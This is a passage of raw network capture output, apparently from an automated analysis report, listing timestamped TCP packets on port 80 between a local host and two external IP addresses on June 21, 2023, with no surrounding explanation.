                                                                                                  Jun 21, 2023 20:23:59.453680992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.453707933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.453735113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.453774929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.453774929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.453774929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.453774929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.457370996 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.627712965 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.627923965 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.627959013 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.628122091 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.628123045 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.633840084 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.634020090 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.634124041 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.634530067 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.634598970 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.634915113 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.634995937 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.635029078 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.635060072 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.635113955 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.635236979 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.678390980 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.681850910 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.683923006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.684123993 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709363937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709417105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709455967 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709460974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709503889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709551096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709597111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709604025 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709656954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709662914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709702969 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709711075 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709745884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709789991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709835052 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709877014 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709883928 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709922075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.709949970 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.709964991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710007906 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710009098 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710052967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710052967 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710110903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710169077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710213900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710213900 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710257053 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710258961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710300922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710342884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710345984 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710387945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710428953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710474968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710517883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710541010 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710541010 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710562944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710608006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710642099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710695028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710736036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710777998 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710819006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710829020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710829020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710860014 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710902929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710902929 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.710942030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.710982084 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711021900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711064100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711078882 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711106062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711137056 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711148024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711188078 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711189985 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711234093 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711275101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711308002 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711317062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711332083 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711360931 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711401939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711438894 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711442947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711483955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711527109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711549044 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711570978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711606026 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711613894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711677074 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711693048 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711735964 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711779118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711805105 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.711821079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711900949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711942911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.711987019 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712035894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712074041 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712074995 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712105036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712147951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712193012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712203979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712235928 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712301016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712330103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712359905 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712388992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712419033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712460041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712522984 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712533951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712546110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712580919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712620974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712663889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712688923 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712707043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712748051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712790966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712831974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712909937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712950945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.712971926 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712971926 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712971926 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.712994099 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713040113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713047028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713082075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713144064 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713156939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713202953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713246107 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713251114 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713288069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713331938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713375092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713396072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713418961 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713455915 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713464975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713507891 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713556051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713598967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713617086 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713617086 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713643074 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713685036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713728905 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713746071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713772058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713779926 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.713818073 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713859081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713905096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713948011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.713990927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714034081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714076996 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714121103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714132071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714132071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714132071 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714167118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714171886 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714210033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714252949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714297056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714330912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714330912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714339018 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714426994 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714468956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714483976 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714622021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714668036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714713097 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714730978 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714756012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714761019 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.714801073 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714847088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714889050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714931965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.714975119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.715018034 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.715060949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.715213060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.715213060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.715213060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.716577053 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.732660055 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740292072 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740362883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740410089 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740454912 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740500927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740525961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740549088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740595102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740605116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740605116 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740641117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740684986 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740730047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740775108 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740802050 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740802050 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740820885 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740864992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740869999 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.740910053 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740955114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.740956068 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741002083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741045952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741051912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741091013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741136074 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741141081 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741179943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741225004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741230965 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741271973 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741316080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741358995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741405010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741449118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741493940 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741540909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741586924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741594076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741631031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741674900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741720915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741720915 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741720915 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741767883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741812944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741858959 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741895914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741895914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.741902113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741947889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.741993904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742038012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742082119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742125988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742135048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742135048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742172956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742182970 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742218971 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742264032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742271900 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742310047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742353916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742362976 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742398024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742443085 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742466927 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742489100 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742536068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742547035 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742583990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742629051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742636919 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742636919 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742675066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742719889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742723942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742794037 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742836952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742882013 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742883921 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742929935 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.742939949 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.742976904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743021011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743079901 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743107080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743151903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743159056 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743197918 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743242025 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743243933 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743288994 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743334055 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743380070 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743382931 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743424892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743431091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743470907 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743515968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743561029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743578911 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743607044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743622065 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.743652105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.743695974 CEST804970445.9.74.80192.168.2.4
